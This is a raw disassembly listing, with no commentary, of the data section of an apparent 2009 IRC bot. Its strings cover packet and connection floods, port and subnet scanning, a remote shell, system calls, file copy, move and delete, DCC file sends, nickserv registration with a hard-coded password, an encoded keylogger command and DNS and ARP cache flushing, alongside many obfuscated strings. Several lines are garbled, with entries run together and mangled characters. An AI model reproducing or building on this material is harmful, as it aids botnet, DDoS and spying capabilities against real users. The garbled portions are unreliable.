align 10h
aLmecq0ygcok db 'lmecq0yGcoK/',0 ; DATA XREF: sub_40A9FE+4A92�o
; sub_40A9FE+4BFE�o ...
align 10h
aRccsh_adukf1 db 'RcCSh.AdUKf1',0 ; DATA XREF: sub_40A9FE+51C9�o
; sub_40A9FE+51EB�o ...
align 10h
aXu6cu1p_sn6_6n db 'XU6CU1p.SN6.6N5aw.affEY1',0 ; DATA XREF: sub_40A9FE+2A72�o
; sub_40A9FE+2AD3�o ...
align 4
aHuudgYqzdz db 'HuuDG/YQZDz/',0 ; DATA XREF: sub_40A9FE+24E�o
; sub_40A9FE+55DC�o ...
align 4
a6hwiyOatg9_6n5 db '6HWiy/OAtg9.6N5aw.affEY1',0 ; DATA XREF: sub_40A9FE+262�o
; sub_40A9FE+57A6�o ...
align 4
aPtami1_agv db 'PTaMI1/.aGV/',0 ; DATA XREF: sub_40A9FE+8844�o
; sub_40A9FE:loc_413260�o ...
align 4
aUhdhc1pcv9i db 'uhdhC1pCV9i/',0 ; DATA XREF: sub_40A9FE:loc_40BF0B�o
; sub_41567F+9EC�o ...
align 4
aWulzr_x7xjb0 db 'WUlZR.X7XjB0',0 ; DATA XREF: sub_40A9FE+29D�o
; sub_40A9FE+1743�o ...
align 4
aBjatzQyrs11 db 'BjAtz/qyRS11',0 ; DATA XREF: sub_40A9FE+2B6�o
; sub_40A9FE+69CF�o ...
align 4
aBvygm_afzkh0 db 'BVYGm.aFzkh0',0 ; DATA XREF: sub_40A9FE:loc_40ADDF�o
; sub_40A9FE+6C08�o ...
align 4
aLcgg60qk2mf0 db 'Lcgg60QK2mf0',0 ; DATA XREF: sub_40A9FE+311�o
; sub_40A9FE+6C68�o ...
align 4
aYhzck13caog0 db 'YhzCK13CaOG0',0 ; DATA XREF: sub_40A9FE:loc_40ADD8�o
; sub_40A9FE+6EA3�o ...
align 4
aAxauo_rlggx0 db 'aXauo.rLGgX0',0 ; DATA XREF: sub_40A9FE+33F�o
; sub_40A9FE+75B2�o ...
align 4
aVfeso_qcgdt_ db 'vfEsO.QcgDt.',0 ; DATA XREF: sub_40A9FE+38E�o
; sub_40A9FE+7AAC�o ...
align 4
aSsoce0jbtxi db 'sSOce0JbTXI/',0 ; DATA XREF: sub_40A9FE+7D26�o
; sub_40A9FE+7DA9�o ...
align 4
aQsoz9_vfvwu0 db 'QSOZ9.vFVWu0',0 ; DATA XREF: sub_40A9FE:loc_40ADAD�o
; sub_40A9FE+7F1C�o ...
align 4
aXiw8_1hhx7d1 db 'Xiw8.1HHX7d1',0 ; DATA XREF: sub_41567F+A60�o
; sub_42045F+14F�o ...
align 4
aO_sxv_ze9bk1go db 'O.sxv.ze9bK1GOISY.dO.Vn1',0 ; DATA XREF: sub_40A9FE+69�o
; sub_40A9FE+A5F�o ...
align 4
aXwzwo1pqcgt16n db 'XWzwO1PqcgT16N5aw.affEY1',0 ; DATA XREF: sub_40A9FE+328�o
; sub_40A9FE+77E1�o ...
align 10h
a5oke1awbzq db '5OkE/1AWBZq/',0 ; DATA XREF: sub_4020BA+C9�o
; sub_406C69+B5�o ...
align 10h
aIhfnL6b5x db '/iHFN/l6B5X/',0 ; DATA XREF: sub_40A9FE+FCF�o
; sub_40A9FE+1637�o ...
align 10h
aAsqfy_k1uah0 db 'AsQfy.K1uah0',0 ; DATA XREF: sub_41567F+A8C�o
; sub_418AD3+126�o ...
align 10h
aBnjcz_zig1m0 db 'bNJcZ.ziG1m0',0 ; DATA XREF: sub_4033A3+6B�o
; sub_40A9FE+8396�o ...
align 10h
aSfe3h0kclgx0 db 'SFe3H0kCLgx0',0 ; DATA XREF: sub_402459+1C6�o
; sub_41567F+AA2�o ...
align 10h
aYdidb16dnmq_ db 'YdidB16dnMQ.',0 ; DATA XREF: sub_402459+A7�o
; sub_402459+C9�o ...
align 10h
aQvdspRbq6w0 db 'QvDsp/rBQ6w0',0 ; DATA XREF: sub_41567F+ABB�o
; sub_4182BA+3F8�o ...
align 10h
aVv3aj1ywfkc_xz db 'VV3AJ1ywFkC.XzinP/s/R0A.',0 ; DATA XREF: sub_40A9FE+52BD�o
; sub_40A9FE+533F�o ...
align 4
aNd4qzY5xml0rna db 'nD4Qz/y5xMl0RNAQI05pV11/XzinP/s/R0A.',0 ; DATA XREF: sub_41567F+AD1�o
; sub_4182BA+722�o ...
align 4
aRy6iq0udbph db 'RY6IQ0UDbPh/',0 ; DATA XREF: sub_41567F+ADC�o
; sub_4182BA+241�o ...
align 4
aW3nki_guvjx db 'w3NKI.gUvJx/',0 ; DATA XREF: sub_41567F+AE7�o
; sub_4182BA+6A9�o ...
align 4
aRy6iq0udbphLlD db 'RY6IQ0UDbPh/LL/Dw.r3B9K/',0 ; DATA XREF: sub_40A9FE+5686�o
; sub_40A9FE+5747�o ...
align 10h
aRy6iq0udbphN2n db 'RY6IQ0UDbPh/N2NHs/pc9zb/8Wb3v063Ds00',0 ; DATA XREF: sub_40A9FE+5912�o
; sub_41567F+AFD�o ...
align 4
a8cbgoRjryr_ db '8CBGO/rJRYr.',0 ; DATA XREF: sub_4020BA+B4�o
; sub_40A9FE+220C�o ...
align 4
aKbwmi16jfhl db 'KbwMi16jFhl/',0 ; DATA XREF: sub_4020BA+C4�o
; sub_402675+B3�o ...
align 4
aIde746o6B_ db 'Ide74/6o6/B.',0 ; DATA XREF: sub_402675+AE�o
; sub_41567F+B21�o
align 4
aY2lm40nv3yaP4m db 'Y2LM40Nv3Ya/p4MrM1AZiAp1eUok8/eobtx1',0 ; DATA XREF: sub_40A9FE+62C3�o
; sub_40A9FE+63B4�o ...
align 10h
a7zfry0iusme1 db '7Zfry0IUSmE1',0 ; DATA XREF: .text:004086F6�o
; .text:00408787�o ...
align 10h
a_9fty1n2tM_ db '.9ftY1N2T/m.',0 ; DATA XREF: sub_401B6E+1E4�o
; sub_401B6E+26F�o ...
align 10h
aVxppy0owq7d db 'VxPpy0owQ7D/',0 ; DATA XREF: sub_401B6E+18F�o
; sub_401B6E+214�o ...
align 10h
aW50oj_ac8ak0 db 'w50OJ.ac8AK0',0 ; DATA XREF: sub_401B6E+1DF�o
; sub_401B6E+26A�o ...
align 10h
aVgh9x1uWay0 db 'VgH9X1u/wAY0',0 ; DATA XREF: sub_401B6E+1BF�o
; sub_401B6E+248�o ...
align 10h
aEih0f1gakfp0 db 'EiH0f1GakFP0',0 ; DATA XREF: sub_401B6E+232�o
; sub_406429+1CE�o ...
align 10h
aUfbss0cbo8c_ db 'uFbSS0Cbo8C.',0 ; DATA XREF: sub_401B6E+1A7�o
; sub_401B6E+226�o ...
align 10h
aLvk_hHddio0 db 'Lvk.H/hddio0',0 ; DATA XREF: sub_401B6E+194�o
; sub_401B6E+219�o ...
align 10h
aJsuah_0_mmw0zb db 'JsuAH.0.mmW0zbFKT0RKhRb0',0 ; DATA XREF: sub_401B6E+184�o
; sub_401B6E+209�o ...
align 4
aAqq27_7qqv10 db 'AQQ27.7qQv10',0 ; DATA XREF: sub_401B6E+179�o
; sub_401B6E+1FE�o ...
align 4
a2Afm0dt3o6_ db '2/Afm0dt3o6.',0 ; DATA XREF: .text:0040868E�o
; .text:loc_408713�o ...
align 4
aQvp40nd9f2 db '/qvP40nD9F2/',0 ; DATA XREF: sub_41567F+BB3�o
; sub_42045F+29C�o ...
align 4
aMkk0_mvscp_hwh db 'mKK0/.MVScP.hwHKV/Er1cB0ZvOBu/66U/i/nNp.h0vRRTD1Po4dT/gU924/',0
; DATA XREF: sub_41567F+BC1�o
; sub_42045F+25E�o ...
align 4
aShktk1eNl8Jlzt db 'sHKtk1e/Nl8/jLZte1JtI/t1',0 ; DATA XREF: sub_41567F+BCC�o
; sub_42045F+14A�o
align 4
aZcm1__num3n0oe db 'ZcM1..nUM3N0OE819.1TEYD.',0 ; DATA XREF: sub_41567F+BD7�o
; sub_42045F+208�o
align 4
a5_xnq0cowxs0 db '5.Xnq0cowXs0',0 ; DATA XREF: sub_40A9FE+8E8�o
; sub_40A9FE+90F�o ...
align 4
a8y4sz09fdh50tc db '8Y4sz09fDH50tccap0cH5OH0/mDXM1sxCV2/iNReP/bJcGz.',0
; DATA XREF: sub_40A9FE+933�o
; sub_40A9FE+955�o ...
align 4
aRnyaa0crtpo0yy db 'RNYAA0crTPO0yYB2h.Fe8bw.iRLzu0EdQ3j/1D6Op1DNN3X.',0
; DATA XREF: sub_40A9FE+968�o
; sub_41567F+BF8�o
align 4
aEuior0ay2w7_ db 'EUIOR0ay2w7.',0 ; DATA XREF: sub_40A9FE+8D7�o
; sub_40A9FE+9C7�o ...
align 4
aTfee90w_vdg1u8 db 'TFEE90W.vdG1u8Ajp1eidrT.d2k2X/no6gm/',0 ; DATA XREF: sub_4033A3+82�o
; sub_4033A3:loc_403443�o ...
align 4
aIbtox1Hofe0hcx db 'IBtOx1/HOfe0Hcxmb/oUlVg00eWuQ.F61Hj/',0 ; DATA XREF: sub_4033A3+C3�o
; sub_40A9FE+D17�o ...
align 4
aTpzyk0moe8_0jt db 'TpzyK0MOE8.0jTPEZ1dC0uG0',0 ; DATA XREF: sub_40A9FE+D68�o
; sub_40A9FE+D8E�o ...
align 4
a4ezrg1ye5hp1o2 db '4Ezrg1ye5hp1O2jqY1BhtQc.jTPEZ1dC0uG0',0 ; DATA XREF: sub_40A9FE+DA4�o
; sub_40A9FE+DCA�o ...
align 10h
aJqrlpUxr08Qqdu db 'JQrlp/UXr08/qqduw/ZeDHN/N/Wda.tYScO0znNna1b7t5k0pequ3.5yg/c/',0
; DATA XREF: sub_40A9FE+DEC�o
; sub_40A9FE+F7A�o ...
align 10h
a4ezrg1ye5hp1au db '4Ezrg1ye5hp1AUz6N/Zzkas/bbUvL0k.zqt1cpO6N/QGUB30',0
; DATA XREF: sub_40A9FE+EE8�o
; sub_40A9FE+F0E�o ...
align 4
a2ms3c_kjtek0 db '2MS3c.kJTeK0',0 ; DATA XREF: sub_40A9FE+1A71�o
; sub_41567F+C53�o
align 4
aOgyzo1Qmpy1 db 'OGyZo1/qmpy1',0 ; DATA XREF: sub_40A9FE+1A6B�o
; sub_41567F+C5E�o
align 4
aNI427pnt0 db 'n/i4//27pnT0',0 ; DATA XREF: sub_40A9FE+1A59�o
; sub_41567F+C69�o
align 4
aXg4wo0gh6fy0p9 db 'xg4wO0Gh6FY0p9CIj.BYYVY.',0 ; DATA XREF: sub_40A9FE+1A53�o
; sub_41567F+C77�o
align 10h
aTarxm0mtxpp_ db 'tArXm0mtxpp.',0 ; DATA XREF: sub_406D7F+D1�o
; sub_407281+63�o ...
align 10h
aQ3bef_grjcn1aa db 'Q3BEf.grJCN1aA/Td0EX07M1',0 ; DATA XREF: sub_40A9FE+19D3�o
; sub_40A9FE:loc_40C41F�o ...
align 4
aPJs70eukyp0 db 'P/JS70EukYp0',0 ; DATA XREF: sub_40A9FE:loc_40C408�o
; sub_41567F+C98�o
align 4
aUDneTzo8s_omqd db 'u/DnE/tzo8s.OMQDW1DERIa/',0 ; DATA XREF: sub_40A9FE+1B93�o
; sub_41567F+CA3�o
align 4
a2n67h0pevch1 db '2n67H0PEVch1',0 ; DATA XREF: sub_41567F+CAE�o
align 4
a5v1zc1efrzg_tc db '5v1zc1EfRZg.tccap0cH5OH0NHckR.k9Wj.1',0 ; DATA XREF: sub_40A9FE+426�o
; sub_41567F+CB9�o
align 10h
a6f3al1m_ydx05y db '6f3aL1m.YdX05ythl/YiVnR/jSlje0VWu/50pequ3.5yg/c/',0
; DATA XREF: sub_40A9FE+B2B�o
; sub_41567F+CC4�o
align 4
a3un9w_temux_5y db '3Un9W.TEMuX.5ythl/YiVnR/J9IiO.VPA7i1',0 ; DATA XREF: sub_41567F+CD2�o
; sub_4182BA+662�o
align 4
aNeuf6qyoiMdAn1 db 'NEuF//6QYOi/Md/AN15kOfy.nR01m1pzFKu1',0 ; DATA XREF: sub_40A9FE+1BD6�o
; sub_41567F+CE8�o
align 4
a7nmru1owjrg0md db '7NmRu1oWjRG0Md/AN15kOfy.nR01m1pzFKu1',0 ; DATA XREF: sub_41567F+CDD�o
align 4
aNxruj_viib6 db 'nxruJ.vIib6/',0 ; DATA XREF: sub_41567F+CF3�o
; sub_418FA1:loc_418FD3�o
align 4
a5gcpxGycn21n1z db '5GCpx/gYCn21N1Zsj.w3Ty30',0 ; DATA XREF: sub_41567F+CFE�o
; sub_418FA1+1AC�o
align 4
aFoabg1acvfoOsd db 'fOaBg1ACVfo/osdpb1E0v95.',0 ; DATA XREF: sub_40A9FE+711�o
; sub_40A9FE+1516�o ...
align 4
aPimgt12pvee_ db 'pImgT12pvEE.',0 ; DATA XREF: sub_40A9FE+28FA�o
; sub_41567F+D14�o
align 4
aJgyqn0dmzir12z db 'jgYqN0dmziR12zQe40gFoLm.rilJR.uuL/I0',0
; DATA XREF: sub_40A9FE:loc_40D330�o
; sub_41567F+D1F�o
align 4
aAqejv_njvii_y8 db 'aQeJV.nJvIi.y8Ri./b5L.q.',0 ; DATA XREF: sub_41567F+D2D�o
; sub_418FA1:loc_419118�o
align 4
aSSSS db '%s %s (%s) %s',0 ; DATA XREF: sub_40A9FE+9F54�o
; sub_40A9FE+9F85�o
align 4
aBuiltOct102009 db ' Built: Oct 10 2009 20:03:55',0 ; DATA XREF: sub_40A9FE+9F38�o
; sub_40A9FE+9F69�o
align 4
aUnsecure db 'Unsecure',0 ; DATA XREF: sub_40A9FE+9E4A�o
; sub_42184C+265�o ...
align 4
aSecure db 'Secure',0 ; DATA XREF: sub_40A9FE+9E43�o
; sub_42184C+295�o
align 4
aSNoSubnetCla_0 db '%s No subnet class specified',0 ; DATA XREF: sub_40A9FE:loc_414711�o
align 10h
aSSSSDWithADe_0 db '%s %s %s %s:%d with a delay of %d seconds for %d minutes using %d'
; DATA XREF: sub_40A9FE+9B94�o
; sub_40A9FE+9C9B�o ...
db ' threads',0
align 4
aSPortInvalid_ db '%s Port invalid.',0 ; DATA XREF: sub_40A9FE+98B9�o
align 10h
aSInvalidPort_ db '%s Invalid port.',0 ; DATA XREF: sub_40A9FE+9897�o
align 4
aSSDForDSecs__0 db '%s --> (%s:%d) for %d secs.',0 ; DATA XREF: sub_40A9FE+93BF�o
aSNoDelay_ db '%s No delay.',0 ; DATA XREF: sub_40A9FE:loc_413D77�o
align 10h
aSShouldRunS_ db '%s Should run: "%s".',0 ; DATA XREF: sub_40A9FE+91EC�o
align 4
aSFailedToParse db '%s Failed to parse command.',0 ; DATA XREF: sub_40A9FE+9141�o
; sub_40A9FE+9258�o
a7: ; DATA XREF: sub_40A9FE+8D77�o
; sub_40A9FE+8EE5�o ...
unicode 0, <7>,0
aVista db 'vista',0 ; DATA XREF: sub_40A9FE+8D4E�o
; sub_40A9FE+8ECE�o
align 10h
a2k3 db '2k3',0 ; DATA XREF: sub_40A9FE+8D2A�o
; sub_40A9FE+8EA7�o
a2k_0 db '2k',0 ; DATA XREF: sub_40A9FE+8CEF�o
; sub_40A9FE+8E59�o
align 4
aMe db 'me',0 ; DATA XREF: sub_40A9FE+8CC8�o
; sub_40A9FE+8E32�o
align 4
a98 db '98',0 ; DATA XREF: sub_40A9FE+8CA1�o
; sub_40A9FE+8E0B�o ...
align 10h
aNt db 'nt',0 ; DATA XREF: sub_40A9FE+8C6E�o
; sub_40A9FE+8DD8�o
align 4
a95 db '95',0 ; DATA XREF: sub_40A9FE+8C3B�o
; sub_40A9FE+8DA5�o ...
align 4
aSTryingToGetEx db '%s Trying to get external IP.',0 ; DATA XREF: sub_40A9FE+8849�o
; sub_40A9FE+8867�o
align 4
a?: ; DATA XREF: sub_40A9FE+8669�o
; sub_40A9FE+86D5�o ...
unicode 0, <?>,0
align 10h
aSSHttp1_1Refer db '%s %s HTTP/1.1',0Dh,0Ah ; DATA XREF: sub_40A9FE+84C1�o
db 'Referer: %s',0Dh,0Ah
db 'User-Agent: Mozilla/5.0 (compatible; MSIE 6.0; Windows NT 5.1; .N'
db 'ET CLR 1.1.4322)',0Dh,0Ah
db 'Host: %s',0Dh,0Ah
db 'Connection: Keep-Alive',0Dh,0Ah
db 0Dh,0Ah,0
align 4
aSSiteFailedToO db '%s Site failed to open.',0 ; DATA XREF: sub_40A9FE+8345�o
; sub_40A9FE+8362�o
aSSiteOpened_ db '%s Site opened.',0 ; DATA XREF: sub_40A9FE+8300�o
aIexplore db 'iexplore',0 ; DATA XREF: sub_40A9FE+82E2�o
align 4
aSS__0 db '%s --> (%s).',0 ; DATA XREF: sub_40A9FE+81FA�o
; sub_40A9FE+8217�o ...
align 4
aSSDDPackets_ db '%s --> (%s:%d) %d packets.',0 ; DATA XREF: sub_40A9FE+8016�o
; sub_40A9FE+8047�o ...
align 4
aSSDWithDPacks db '%s --> (%s:%d) with %d packs',0 ; DATA XREF: sub_40A9FE+7C31�o
; sub_40A9FE+7DAE�o
align 4
aSSDWithDConnSF db '%s --> (%s:%d) with %d conn',27h,'s for %d sec',27h,'s',0
; DATA XREF: sub_40A9FE+7AB1�o
align 4
aSSForDSecS db '%s --> (%s) for %d sec',27h,'s',0 ; DATA XREF: sub_40A9FE+790B�o
align 10h
aSSDForDSecS db '%s --> (%s:%d) for %d sec',27h,'s',0 ; DATA XREF: sub_40A9FE+78B0�o
; sub_40A9FE+78E1�o
aSSD_1 db '%s --> (%s:%d)',0 ; DATA XREF: sub_40A9FE+7676�o
; sub_40A9FE+769C�o ...
align 4
aSSForDSecs_ db '%s --> (%s) for (%d secs).',0 ; DATA XREF: sub_40A9FE+7495�o
; sub_40A9FE+74BB�o ...
align 4
aSSForDSecsWith db '%s --> (%s) for %d secs with %d ms delay.',0
; DATA XREF: sub_40A9FE+6D20�o
; sub_40A9FE+6D51�o ...
align 4
aSSDForDSecs_ db '%s --> (%s:%d) for (%d secs).',0 ; DATA XREF: sub_40A9FE+6A70�o
; sub_40A9FE+6F53�o ...
align 4
aSPortPscanStar db '%s Port pscan started: %s:%d with delay: %d(ms).',0
; DATA XREF: sub_40A9FE+65BD�o
align 4
aSSSSDWithADela db '%s %s %s %s:%d with a delay of %d seconds for %d minutes using %d'
; DATA XREF: sub_40A9FE+62AB�o
db ' threads.',0
align 4
aSequential db 'Sequential',0 ; DATA XREF: sub_40A9FE+629A�o
; sub_40A9FE+6390�o ...
align 10h
aRandom db 'Random',0 ; DATA XREF: sub_40A9FE+6293�o
; sub_40A9FE+6389�o ...
align 4
aSNoSubnetClass db '%s No subnet class specified.',0 ; DATA XREF: sub_40A9FE+6157�o
align 4
aSNoIpSpecified db '%s No IP specified.',0 ; DATA XREF: sub_40A9FE+6089�o
; sub_40A9FE:loc_41470A�o
aD_x_x_x db '%d.x.x.x',0 ; DATA XREF: sub_40A9FE+6004�o
; sub_40A9FE+990E�o
align 4
aX_x_x_x db 'x.x.x.x',0 ; DATA XREF: sub_40A9FE+5FD6�o
; sub_40A9FE+98DC�o
aSInvalidPort db '%s Invalid port',0 ; DATA XREF: sub_40A9FE+5F9C�o
aSIsOn_ db '%s is on.',0 ; DATA XREF: sub_40A9FE+5CE9�o
align 4
aSIsOff_ db '%s is off.',0 ; DATA XREF: sub_40A9FE+5CA2�o
; sub_40A9FE+5D1D�o ...
align 4
aSIsSetToSDUSPS db '%s is set to %s:%d U: %s P: %s F: %s',0 ; DATA XREF: sub_40A9FE+5BC4�o
; sub_40A9FE+5C30�o
align 10h
aSSDDDDD_exe db '%s%s%d%d%d%d%d.exe',0 ; DATA XREF: sub_40A9FE+5884�o
align 4
aSSS_ db '%s %s %s.',0 ; DATA XREF: sub_40A9FE+568C�o
; sub_40A9FE+574D�o ...
align 10h
aSConnectionClo db '%s Connection closed: (%i/%ikB sent).',0 ; DATA XREF: sub_40A9FE+5563�o
align 4
aSTimedOutClosi db '%s Timed Out, closing connection.',0 ; DATA XREF: sub_40A9FE+5462�o
align 4
aSDDI db '%s %d %d %i',0 ; DATA XREF: sub_40A9FE+5408�o
aDccSendSS db 'DCC Send %s (%s)',0 ; DATA XREF: sub_40A9FE+53CF�o
align 4
aSendingYouS db 'Sending you %s',0 ; DATA XREF: sub_40A9FE+53AF�o
align 4
aSBindSD db '%s Bind %s <%d>',0 ; DATA XREF: sub_40A9FE+5349�o
aSSD db '%s %s <%d>',0 ; DATA XREF: sub_40A9FE+52C7�o
; sub_40A9FE+841D�o ...
align 4
aSNoFile db '%s No file',0 ; DATA XREF: sub_40A9FE+5284�o
align 4
aSFailedToOpenS db '%s Failed to open: "%s",error: <%d>',0 ; DATA XREF: sub_40A9FE+5154�o
; sub_40A9FE+517C�o
aSOpenedS_ db '%s Opened: "%s".',0 ; DATA XREF: sub_40A9FE+50FA�o
align 4
aOpen db 'open',0 ; DATA XREF: sub_40A9FE+50E5�o
; sub_40A9FE+82E7�o ...
align 4
aSFailedToSetAt db '%s Failed to set Attributes to: "%s",error: <%d>',0
; DATA XREF: sub_40A9FE+5097�o
; sub_40A9FE+50BF�o
align 4
aSAttributesSet db '%s Attributes Set to: "%s".',0 ; DATA XREF: sub_40A9FE+5070�o
aSFailedToCopyS db '%s Failed to copy: "%s" to "%s",error: <%d>',0
; DATA XREF: sub_40A9FE+4FE5�o
; sub_40A9FE+5014�o
aSCopiedSToS db '%s Copied: "%s" to "%s"',0 ; DATA XREF: sub_40A9FE+4F79�o
aSFailedToMoveS db '%s Failed to move: "%s" to: "%s", error: <%d>',0
; DATA XREF: sub_40A9FE+4E4D�o
; sub_40A9FE+4E7C�o
align 4
aSMovedSToS db '%s Moved: "%s" to: "%s"',0 ; DATA XREF: sub_40A9FE+4DE9�o
aSSDoesnTExist_ db '%s %s doesn',27h,'t exist.',0 ; DATA XREF: sub_40A9FE:loc_40F705�o
align 4
aSSIsNotAFolder db '%s %s is not a folder.',0 ; DATA XREF: sub_40A9FE:loc_40F6FE�o
align 10h
aSFailedToDelet db '%s Failed to delete folder: %s',0 ; DATA XREF: sub_40A9FE:loc_40F6F4�o
align 10h
aSFolderDeleted db '%s Folder deleted: %s',0 ; DATA XREF: sub_40A9FE+4CEC�o
align 4
aSFailedToDelFi db '%s Failed to del file: %s, error: <%d>',0 ; DATA XREF: sub_40A9FE+4C67�o
; sub_40A9FE+4C8F�o
align 10h
aSFileDeletedS db '%s File deleted: %s',0 ; DATA XREF: sub_40A9FE+4C40�o
aSFileDoesnTExi db '%s File doesn',27h,'t exist: %s',0 ; DATA XREF: sub_40A9FE+4C12�o
align 10h
aSFileExistsS db '%s File exists: %s',0 ; DATA XREF: sub_40A9FE+4C03�o
align 4
aSFailedToReadF db '%s Failed to read file: %s,error: <%d>',0 ; DATA XREF: sub_40A9FE+4BA6�o
; sub_40A9FE+4BCE�o
align 4
aSFileDisplayed db '%s File displayed: %s',0 ; DATA XREF: sub_40A9FE+4B50�o
align 4
aSDisplayingFil db '%s Displaying file: %s',0 ; DATA XREF: sub_40A9FE+4AA1�o
align 4
aSCommandsS_ db '%s Commands: %s.',0 ; DATA XREF: sub_40A9FE+4937�o
align 10h
asc_440D90: ; DATA XREF: sub_40A9FE+48D1�o
; sub_40A9FE+857F�o ...
dw 0Ah
unicode 0, <>,0
aSShellReady_ db '%s Shell ready.',0 ; DATA XREF: sub_40A9FE+47C8�o
; sub_40A9FE+47E6�o
aSCouldnTOpenSh db '%s Couldn',27h,'t open shell.',0 ; DATA XREF: sub_40A9FE+4786�o
aSSystemcallSen db '%s SystemCall sent: "%s"',0 ; DATA XREF: sub_40A9FE+46F9�o
align 4
aSSystemcallFai db '%s SystemCall failed.',0 ; DATA XREF: sub_40A9FE+46E0�o
align 10h
aSUnloaded_ db '%s Unloaded.',0 ; DATA XREF: sub_40A9FE+4627�o
align 10h
aSNickservDrop db '%s nickserv drop',0 ; DATA XREF: sub_40A9FE+45F4�o
align 4
aSNickservRegis db '%s nickserv :register pass103 %s',0 ; DATA XREF: sub_40A9FE+45C1�o
align 4
aS@S_com db '%s@%s.com',0 ; DATA XREF: sub_40A9FE+45A4�o
align 4
aSMemoservSendS db '%s memoserv :send %s %s',0 ; DATA XREF: sub_40A9FE+455D�o
dword_440E5C dd 25207325h, 13A2073h, 20434344h, 444E4553h, 73252220h
; DATA XREF: sub_40A9FE+3E0D�o
; sub_40A9FE+3F02�o
dd 31322022h, 30373033h, 33333436h, 1642520h, 0
dword_440E84 dd 206325h aSSDccSendCS db '%s %s :DCC SEND C:\\\\%s',0 ; DATA XREF: sub_40A9FE+3CDB�o
align 4
dword_440EA4 dd 25207325h, 23A2073h, 25323103h, 73250373h, 25323103h
; DATA XREF: sub_40A9FE+3CBB�o
dd 20373h
dword_440EBC dd 25207325h, 13A2073h, 20434344h, 444E4553h, 20732520h
; DATA XREF: sub_40A9FE+3C8C�o
dd 30333132h, 34363037h, 25203333h, 164h
dword_440EE0 dd 25207325h, 13A2073h, 20434344h, 444E4553h, 2E642520h
; DATA XREF: sub_40A9FE+3C5C�o
dd 20657865h, 63657845h, 6E697475h, 69662067h, 2520656Ch
dd 164h, 0
dword_440F10 dd 25207325h, 13A2073h, 20434344h, 444E4553h, 2E642520h
; DATA XREF: sub_40A9FE+3C22�o
dd 20747874h, 6E65704Fh, 25206465h, 202C2064h, 64616572h
dd 2C676E69h, 706D6F63h, 6574656Ch, 202D2064h, 6F6C7075h
dd 63206461h, 6C706D6Fh, 21657465h, 1
dword_440F5C dd 25207325h, 13A2073h, 20434344h, 444E4553h, 576F5720h
; DATA XREF: sub_40A9FE+3BE8�o
dd 5F736569h, 69576F57h, 575F7365h, 6569576Fh, 31322073h
dd 30373033h, 33333436h, 1642520h, 2 dup(0)
dword_440F98 dd 64250302h, 5964252Ch, 2C642503h, 34F6425h, 252C6425h
; DATA XREF: sub_40A9FE+3BB9�o
dd 3A05564h, 252C6425h, 25034864h, 64252C64h, 64250341h
dd 5664252Ch, 2C642503h, 0A0456425h, 2C642503h, 3426425h
dd 252C6425h, 25034564h, 64252C64h, 64250345h, 4E64252Ch
dd 642503A0h, 5064252Ch, 2C642503h, 3556425h, 252C6425h
dd 3A05464h, 252C6425h, 25034964h, 64252C64h, 2503A04Eh
dd 64252C64h, 64250354h, 4864252Ch, 2C642503h, 0A0456425h
dd 2C642503h, 63256425h, 2C642503h, 3576425h, 252C6425h
dd 2034E64h, 0
dword_441040 dd 69257325h, 0 dword_441048 dd 434F4E4Bh, 7325204Bh, 73253A20h, 0dword_441058 dd 25207325h, 73252073h, 0 ; sub_40A9FE+36D3�o ...
dword_441064 dd 25207325h, 13A2073h, 474E4946h, 15245h ; sub_40A9FE+342F�o ...
dword_441074 dd 25207325h, 13A2073h, 53524556h, 14E4F49h, 0 ; sub_40A9FE+4308�o
dword_441088 dd 25207325h, 13A2073h, 474E4950h, 1 ; sub_40A9FE+333F�o ...
dword_441098 dd 25207325h, 13A2073h, 17325hdword_4410A4 dd 64250302h, 2064252Ch, 3026325h, 0dword_4410B4 dd 64250302h, 2564252Ch, 3022063h, 2 dup(0)unk_4410C8 db 3Fh ; ? ; DATA XREF: sub_40A9FE+2F07�o
db 1, 44h, 43h
aCSendFf???f?11 db 'C SEND "ff???f?𝑹𝑰𝑷𝑳𝑶w'
db '923;𝑺𝑼𝑷𝑮𝑼𝒀⻙'
db '0;" 0 0 0',0
dword_441158 dd 64250302h, 3F64252Ch, 43434401h, 4E455320h, 66222044h
; DATA XREF: sub_40A9FE+2EF6�o
dd 3F3F3F66h, 20223F66h, 20302030h, 20330h, 0
dword_441180 dd 64250302h, 5964252Ch, 2C642503h, 34F6425h, 252C6425h
; DATA XREF: sub_40A9FE+2EC9�o
dd 3A05564h, 252C6425h, 25034864h, 64252C64h, 64250341h
dd 5664252Ch, 2C642503h, 0A0456425h, 2C642503h, 3426425h
dd 252C6425h, 25034564h, 64252C64h, 64250345h, 4E64252Ch
dd 642503A0h, 5064252Ch, 2C642503h, 3556425h, 252C6425h
dd 3A05464h, 252C6425h, 25034964h, 64252C64h, 2503A04Eh
dd 64252C64h, 64250354h, 4864252Ch, 2C642503h, 0A0456425h
dd 2C642503h, 63256425h, 2C642503h, 3576425h, 252C6425h
dd 73204E64h, 74726174h, 79656B20h, 67676F6Ch, 2037265h
dd 0
aAbcdefghijklmn db 'abcdefghijklmnopqrstuvwxyz1234567890abcdefghijklmnopqrstuvwxyz',0
; DATA XREF: sub_40A9FE+2CBA�o
; sub_40A9FE+3D5C�o ...
align 4
aSSS db '%s %s :%s',0 ; DATA XREF: sub_40A9FE+2C7E�o
; sub_40A9FE+2F28�o ...
align 4
aSLoadedOntoSDA db '%s Loaded Onto: (%s:%d), Amount: (%d)',0 ; DATA XREF: sub_40A9FE+2AD8�o
; sub_40A9FE+2B0D�o
align 4
aSTooMuchConns_ db '%s Too Much conns.',0 ; DATA XREF: sub_40A9FE+2A77�o
align 10h
aSObtainingExte db '%s Obtaining external IP',0 ; DATA XREF: sub_40A9FE+299F�o
align 4
aSSSS_ db '%s %s: %s -> %s.',0 ; DATA XREF: sub_40A9FE+2904�o
align 10h
aSFailedToLoadD db '%s Failed to load dnsapi.dll.',0 ; DATA XREF: sub_40A9FE:loc_40D275�o
align 10h
aSFailedToFlu_0 db '%s Failed to flush DNS cache.',0 ; DATA XREF: sub_40A9FE:loc_40D26B�o
align 10h
aSDnsCacheFlush db '%s DNS cache flushed.',0 ; DATA XREF: sub_40A9FE+2863�o
align 4
aSFailedToFlush db '%s Failed to flush ARP.',0 ; DATA XREF: sub_40A9FE+2838�o
aSArpFlushed_ db '%s ARP flushed.',0 ; DATA XREF: sub_40A9FE+282D�o
aSClientNotOp_0 db '%s Client not open or found: "%s"',0 ; DATA XREF: sub_40A9FE:loc_40D1F3�o
align 4
aSCommandSentS db '%s Command sent: "%s"',0 ; DATA XREF: sub_40A9FE+27EE�o
align 4
aSClientNotOpen db '%s Client not open.',0 ; DATA XREF: sub_40A9FE+274E�o
